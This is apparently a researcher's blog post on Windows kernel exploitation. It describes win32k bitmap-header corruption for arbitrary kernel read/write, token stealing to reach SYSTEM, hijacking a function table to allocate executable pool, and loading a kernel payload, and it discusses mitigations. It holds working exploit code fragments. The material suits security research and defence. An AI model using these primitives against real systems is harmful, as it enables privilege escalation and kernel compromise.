NutShell of Kernel Security :

Cracks by Design ?

In our recent talk at recon we was targeting Windows Kernel Exploitation, where we introduced new techniques and bit different point of view when it comes to kernel exploitation & arbitrary kernel code execution. In this blog post i will elaborate more on those approaches, their root cause and why we choose exploitation in that way.

At first I will define terms :

By Code : relatively easy to fix, kind of feature* adopted by some code but change does not affect design of OS

: relatively easy to fix, kind of feature* adopted by some code but change does not affect design of OS By Design : hard to impossible to fix in current implementation, without refactoring large code base (or redesigning from scratch) highly non-efficient

*feature or bug ... depends on point of view

*except WINDOWS SPECIFIC - TRICKING

KERNEL over the USER, or ... ?

Disclaimer : Goal of following blog-post is not critise OS kernels, but elaborate on some caveats in current implementations to prevent future abuse of it. In fact OS kernels continue to evolve and invent different mitigations, however there is still long way to go.. At writting those lines of blog-post was not harmed any PC nor disclosed any 0day! Note : In this blog-post i expect, that you have kernel buffer overflow bug, or another bug which can be turned to buffer overflow.Throughout the post i used windows kernel object as example, but mindset / way / idea is generic* to some other OS (f.e. linux, etc) and applicable there as well

When it comes to kernel and user mode, it should be two separated worlds, where unprivileged-user has almost 0-knowledge and has really *little* control about kernel state. But unfortunately many times in many OS it is not like that...

Kernel Objects : Resides in kernel pool Used to preserve some state Hold some other data as well

Weak points : Many times allocation reachable from usermode on users will Many times size of object controllable by user as well Many times holds data controlled by user

Consequences : Pool Spray, Pool Layout, user:kernel data = 1:1



As a shiny example is win32k! _GRE_BITMAP residing in kernel session space with documented api.

Documentation in attacker point of view #1 - By Code *PoolControll* :

CreateBitmap : kmalloc(size)

DeleteObject : kfree(size)

Very nasty feature of win32k!_GRE_BITMAP is that size can be small (less than PAGE_SIZE) and also large. And what is very sad for windows, *big* pool memory management does not implement (or it really sucks) randomization there. But why do we even bother ?

Because you can do very *very* precise & stable PoolLayout! To be fair even on kernel with randomization in place for big pools, you can overcome it and make PoolLayout as well, but as I talked about it at confidence this year...

..it is far more harder and far less reliable! One big advantage of pool (buffer) overflows is that other bug-classes (such as race conditions, integer over/under flows, TOCTOU, OOB, ...) can be often turned to buffer overflow, which make overflow very universal point. And as for overflow you can implement generic techniques, based on size of memory chunk and type of pool, and that escalating overflows to very mighty way to go. What was proposed* at my talk at syscan :

Encrypt object state

Per object integrity

use x64 address space "inbalance"

[ rnd*no_access ] [ rnd space ] [ *pool object* ] [ padding ] [ rnd*no_access ]

Encrypt object state { members, pointers } [ not only metadata of memory chunk ] Per object integrity usage of object specific canary protect against UAF and against blind rewriting/leaking from/to usermode, .. use x64 address space "inbalance" (virtual vs physical) to better extent by PAGE_NOACCESS, aka PageHeap alike approach, but more pages involved and randomization per (big & arrays & ..) allocation

You can also abstract Pool Object with "Pool". That means concept fairly similar to current pool separation but with improved granularity. In every pool will reside specified objects (kernel cache on linux / or IsolatedHeap alike approach) only (preferably as less as possible), and also separated pools for objects which is more likely to be overflowed from (arrays, buffers).

* links :

Encoding and Decoding Function Pointers

Back to the CORE (7 - 12)

Encrypting object state (structs, classes members, vtables, pointers) i consider as a crucial part, as it can move exploitation from very easy to hard. As i previously state user should have almost 0-knowledge about kernel mode state, but in fact, as we look at f.e. win32k!_GRE_BITMAP header (as that i choose to be example of this blog post, but same applies for other objects in windows or other OS as well) closer :

#pragma once #include "UndocHolder.h" #include "../usr_common.h" struct _GRE_BITMAP : private CUndocHolder { uint32_t& Width(); uint32_t& Height(); void*& Head(); void*& Curr(); static const size_t const StructSize(); };

that we can see very usefull information there (and that i simplified to pinpoint only some), and as we can say 0-knowledge is not case at current kernels. You can do important assumption about "unknown" state :

Plain *pointers* you can rewrite it with another pointer (function / buffer /... ) you can use it to overwrite with it f.e. addr_limit / MmUserProbeAddress you know that base is in some range (depends on pool) you know that it (should)points to valid location you know that it (should)points to specific location ... Plain *members*

Plain *members* you know exact value! you can substitute member with yours, preciselly control state of object



This kinda betray one part of effectivness of SMAP, because in SMAP (in some OS implemented already, in some not yet) era you can not reference usermode memory directly, and when you introduce controllable or easy to guess / predictable memory (by user) in kernel, it inserts kind of backdoor opened to misuse.

Documentation in attacker point of view #2 - By Design *fullKernelIo* :

SetCreateBitmapBits : FullKernelIo.Write

GetCreateBitmapBits : FullKernelIo.Read In another words, when you have buffer overflow (at least with semi controlled overflow what), able overflowing to bitmap/cool-object (reachable size / height / width), then it is trivial to turn it to *FullKernelIo*!

Not sure if it is visible on first look, but you can think about this implementation :

protected: //we already overflow to m_bitmapPoolIo //from m_bitmapPoolIo we can alter following m_bitmapFullIo template bool WRITE inline bool Io( __in_bcount(size) void* addr, __inout_bcount(size) void* buff, __in size_t size ) { m_bitmap->Curr() = addr; m_bitmap->Width() = -1; m_bitmap->Height() = -1; //overflow to following win32k!_GRE_BITMAP header size_t size_delta = &m_bitmap->Height() - m_bitmap->JunkBegin() + sizeof(m_bitmap->Height()); auto sz = SetBitmapBits( m_bitmapPoolIo, size_delta, m_bitmap->JunkBegin()); if (sz != size_delta) return false;//that hurts ... return (size == (WRITE ? SetBitmapBits( m_bitmapFullIo, size, buff) : GetBitmapBits( m_bitmapFullIo, size, buff) )); }

That is pretty bad, especially when you think that for achieving this state it is enough to turn on one bit (0 to 1) in weight or height (of course one bit from X of 0xXXXXXX00) to be able to reach following header, and then from one win32k!_GRE_BITMAP you can controll another! And thats it! Almost the end of your journey in exploitation when it comes to simple escalating privileges to SYSTEM. For escalating privs is cleaner solution to do *not step* into kernel at all as it is kinda overkill, because you should then deal with SMEP, SMAP, NonExec, (later CFG alike mitigations), etc. and that *should* be hard. But when you achieve full kernel IO (as you can see from code snippet), then only think what you need is to achieve leak of nt!_EPROCESS pointer to your own process and update your token (for example copy system process one). And you are done without dealing with any additional kernel protection!

Leak nt!_EPROCESS is not even challange as you have here _sidt / _sgdt and sadly even easier with user!gSharedInfo. Difference between those two approaches i point as By Design *hardware* and By Code *fail*. As _sidt / _sgdt seems not so easy to handle with (at least some pointer mangling ?) to mitigate it for usage at exploitation. But as for user!gSharedInfo, it is just ridiculous, and i really believe it will be striped out as soon as possible as i was almost naive to think that this kind of leaking informations was reached its end and covered by nice presentation by alex. And this is directly connected with another problem, because nowadays FullKernelIo is everything what you need, and to be bit poetic like alex you can find 99* ways how to achieve FullKernelIo. * and more :)

Side note : In case of secure OS, FullKernelIo should means almost *nothing* helpful for you without additional *info-leak bug*! Because now you have x64 virtual address space which is much more wider that physical address space, and you have also KASLR (on virtual address space level). That *should* means, that you got FullKernelIo but you can not use it like it is, because you will most likely panic with access violation as you tries randomly read / write. As i said this situation can be solved most likely in secure oriented OS as well, by additional info leak bug or using overflows (but overflow should be mitigated to big extent also :). But that is far more complicated way to go!

GOAL : KERNEL EXEC

In fact imagine that you have FullKernelIo (lets say not so unimaginable to achieve :) ) but you are not satisfied with system calc / process, and you want to install kernel driver. Here is very important to mention, that how we pay attention to sandbox processes, to make distinction and large gap between low privilaged process and admin elevated process, the same aplies in administrator process vs kernel mode driver! (and then supervisor vs hypervisor, etc.) In case of kernel mode driver you will now challange KernelSigningDriverEnforecement or { SMEP, SMAP, NonExec (lets say CFG also) } . Obviously (+-) second group of challanges make our lives easier.

For dealing with SMEP, SMAP, NonExec there are some known options especially when you have FullKernelIo.

Find a RWE page, what i rate as By Code *obsolete*, as those kind of pages should have been already extincted , but in reality it is not that world we are living in. As recent example was nice j00ru attack, Alex proposed some targets and wrote nice article with some solutions & proposals, i proposed another rwe page at LinkList related talk and even before many other guys as well.

, but in reality it is not that world we are living in. Abuse page tables @__x86, @aionescu, @zer0mem - Mess with PTE for particular page/s

@__x86, @aionescu, @zer0mem - Mess with PTE for particular page/s Misuse behaviour of VadRoot / task_struct->mm as EPT / TrustZone / ... may disallow you to alter directly page table, you can introduce new node of your own memory to this list instead. Node with specified RWE privs, and you will need just to invoke ACESS_VIOLATION touch on page described by yours node, it will cause page_fault handler, and it adds wished entry to PageTable, voala! more on that aproach and how it is exploitable at my syscan talk.



But as i am hater of shellcode, RWE pages will (... should ... hopefull could ...) be sooner or later excluded, TrustZone / EPT / .. in place and VadRoot/mm handled, so i will choose another solution (see WINDOWS SECTION - TRICKING).

STACK HOOKING

Once you get RWE page and FullKernelIo, then you need to ship your code to kernel, and jump at selected entry point of you kernel mode code. Pretty easy, when it is not any additional hardening in your way! But we know there are already some mitigation in place, not so widespread in kernel yet, but hopefully will be soon!

CFG : protecting indirect calls (and additional functionally as well). Prevent early stage of ROP (and non-registered function redirection in general) on protected places as indirect calls. And that can be a problem for us, because, when we want to reach control flow in kernel, we will need to use indirect call* (/interrupt)! Or we can do it in a different way as *any* RW instruction can access our stack, and our stack is magic box where is mixed data and control flow info! And in that case every CFI solution (as i am able to think of now) will be imperfect By Design *STACK* Root cause is as i mention that any RW instruction can access our stack, and that can be solved by separate CF stack, which can be achieved most efficiently with support of hardware, but is not likely to happen soon though :\ but i hope in some day in bright security future it will happen ... In addition, as i was trying to challenge myself during exploitation, so i imagined that CFG is enabled across whole kernel, and reflect it in WINDOW SECTION - TRICKING where is implemented function-driver-attack (FDA) and it should bypass CFG. As CFG uses bitmap for registering valid calls, in my FDA attack i used simple one purpose functions but is possible that they will not be registered in that bitmap (hopefully they will not be there). In that case you will need another functions, and chain it together to get same results. As when it comes to kernel exploitation, when you achieve FullKernelIo (and again - it is easy achievable) then you most likely can overwrite function pointers multiple times, and invoke particular syscalls also multiple times, so invoke different routines for given purpose is not a problem. It means you will *not* achieve your goal by *one* system call of chained ROP, but you will need more syscalls to achieve your goal step by step** instead. At this topic i talked at syscan this year, and also same time was presented vfgadgets approach (sharing similiar base idea behind) - very nice paper! *unless you are able to modify image of some driver - PageTables, but be aware of PatchGuard & Hardware mechanism in future ** side note : nice example of step by step changing state is The M/o/Vfuscator - good to read, can expand your way of thinking ;)

SafeMemory (not in kernel .. yet?) : Meanwhile it is very nice research coming out, and recognized by some as way to go, what i totaly agree with! This approach tries to protect function pointers in general (stack & vtables), with separation to safe memory accessible only in special way (x86 via segment registers) that means in case of memcpy, or our FullKernelIo.Write, will not affect protected function pointer! Nice paper on this research you can find here! and also bunch of more informations at dslab



WINDOWS SECTION - TRICKING

On windows allocations works in this way :

in addition you have x64 calling convention, so for arguments are used @rcx and @rdx (on intel). First think to understand, that does not matter what @rcx & @rdx is supposed to be before call, in ExAllocatePool will be always interpreted as Flag & Size!

Idea here is to not mess with PageTable in any way, but allocate our own RWE page by ourselfs (*from user mode). Here you face with few "how to" problems :

call this routine

leak base of allocation back to user

provide correct arguments to this routine (flags & size)

You already has achieved FullKernelIo, and in this case you need to find appropriate RWE function pointer (/vtable) and exchange it with ExAllocatePool function pointer, in addition this function pointer must be callable from user mode (via syscall, somewhere in caller chain). For this exist some another options (HalDispatchTable, interrupts table, ..), but lets take a look at another candidate NtUserMessageCall routine :



as you can see, in this routine is invoked virtual call, and lets going deeper :



it has RW function table and as a bonus it is stored in win32k .data section, what means you can locate it very easily! And also it is almost directly call-able from user mode :



One of the reason why i choose this routine, was that it provide really simplistic wrapping around virtual call.



It invoke virtual call and entrust output back to user!

As i mention already, it is pretty neat that you can call ExAllocatePool now, but crucial momentum of success is to provide correct arguments. As for size it is second argument and is provided directly to syscall, so problem stand only for FLAGS. And as you can see here :



is almost no controlled, because it is WINDOW pointer! But now comming bit cheating, because as i previously stated for ExAllocatePool it does not matter that it is a pointer, it will be interpreted as flag. As for ExAllocatePool this flags matter :

typedef enum _POOL_TYPE { NonPagedPool, NonPagedPoolExecute = NonPagedPool, PagedPool, NonPagedPoolMustSucceed = NonPagedPool + 2, DontUseThisType, NonPagedPoolCacheAligned = NonPagedPool + 4, PagedPoolCacheAligned, NonPagedPoolCacheAlignedMustS = NonPagedPool + 6, MaxPoolType, NonPagedPoolBase = 0, NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2, NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4, NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6, NonPagedPoolSession = 32, PagedPoolSession = NonPagedPoolSession + 1, NonPagedPoolMustSucceedSession = PagedPoolSession + 1, DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1, NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1, PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1, NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1, NonPagedPoolNx = 512, NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4, NonPagedPoolSessionNx = NonPagedPoolNx + 32 } POOL_TYPE;

we are looking for NonPagedPool with EXEC (NonPagePool* ^ NonPagePoolNx)! Next point is that WINDOW pointer is translated from WINDOW HANDLE, and this handle is provided to our syscall as well, so we can control it (+-)!

OK, so now we can do multiple allocations, and hoping one of them will be RWE ? how we find out if it is RWE (ok we can take a look at its PTE) ? yeah that can be solution, but it is kinda overkill in comparsion with recursive cheating!

Recursive cheating ? Lets imagine that what we did with ExAllocatePool, we do with another function



what is this ? it in fact returning "arg1 + const". Do you get my point ?

Also it is not maybe too straightforward to see trough, but lets repeat our current problem with ExAllocatePool : lack of ability to provide controlled Flag argument (we want RWE flag & NonPaged), because first argument is WINDOW pointer translated from WINDOW HANDLE. In another words achieving ExAllocatePool(RWE + NonPaged, Size) is equivalent to knowledge of translation between WINDOW HANDLE to WINDOW pointer (it must be wished Flags).

__checkReturn CWindow* GetRweWindowHandle() { wlist w_list; CWindow* wnd = nullptr; for (size_t i = 0; i < 0xFFFF; i++) { wchar_t name[4]; for (size_t j = 0, val = i; j < _countof(name); j++, val /= 10) name[j] = '0' + ((val % 0x10) > 9 ? ('A' - '0' + (val % 10) - 9) : (val % 0x10)); wnd = new CWindow(name); if (!wnd) break; if (IsWindowHandleRweFlag(wnd->Hwnd())) return wnd; w_list.push_back(*wnd); } return nullptr; }

If it is still not clear here, then rethink it again and pay close attention to code snipet. hint : PsGetProcessImageFileName is bit misused yeah it is kinda tricking / cheating, but it is always like this, when it comes to messing with logic of some state of machine - exploitation...

WRAP UP

We achieved important checkpoints :

FullKernelIo

controlled RWE kmalloc

and complexity of exploitation so far :

*1 overflow on session pool in this example, but as i state before similiar powerful objects on other pools as well (maybe one of todo blog-posts) *2 overflow or ANY bug CONVERTABLE to overflow*

Kernel Code Execution - Kernel mode driver

And now it is time for party at ring0 with ACE (arbitrary code exec)! I already mention that i do *not* like shellcoding, but for avoiding that you need have some technology.. And as we already publish our CC-SHELLCODING framework, you have it too!



So lets take a look at our kernel mode *driver* payload - shellcode free!

void DoEscape() { auto packet = static_cast (CKernelModule::Param()); CProcessById proc2boost(packet->ToSystemBoostProcId); if (!proc2boost.Get()) return; printf("

Ping from Kernel! PsGetCurrentProcess() => %p

", PsGetCurrentProcess()); CTokenBoost sys_token(PsGetCurrentProcess()); sys_token.ImpersonateProcess(proc2boost.Get()); }

class CTokenBoost { CScopedObjHandle m_leader; public: CTokenBoost( __in void* process ) : m_leader(static_cast (process)) { } void ImpersonateProcess( __in void* proc2boost ) { auto eproc = static_cast (proc2boost); if (!BoostToken(eproc)) eproc->Token() = m_leader->Token();//ufff, something goes wrong ?! } protected: __checkReturn bool BoostToken( __in _EPROCESS* proc2boost ) { CDerefHandle token(DuplicateToken()); if (!token.get()) return false; CScopedHandleObj token_obj(token.get(), GENERIC_READ); if (!token_obj.get()) return false; //kinda hacky, but seems NtSetInformationProcess => 0xc00000bb a.k.a not supported proc2boost->Token() = token_obj.release();//dont decrease reference count!! return true; }

Features

c++ kernel mode code

own DRIVER_OBJECT (ioctl, etc...)

compiled & developed with your user mode code

easy installation

TODO

register our kernel module to driver list (as callback functions will refuse its usage without)

As i mention in feature list already, your file is composed from user mode & kernel driver code and sharing same code base so no need for attaching kernel code as a resource or hardcode it to binary, it is developed with your user mode code directly (for more info check cc-shellcoding framework)! And as i stand with easy installation, it means you just copy your PoC (*user mode PE*) image to kernel :

FullKernelIo.Write(kmalloc(POC_PE.Size), POC_PE.Base, POC_PE.Size)

and jump to different entry point of your binary (stack hooking is preferable choise if CFG enabled in future)!

ACE(POC_PE.KernelModeEntry);

At the end of our blog post we are releasing sneak peak from our win32k escape code, more code will follow in next blog posts, enjoy!

btw. in case you like this blog post, do not hesitate to share it ;)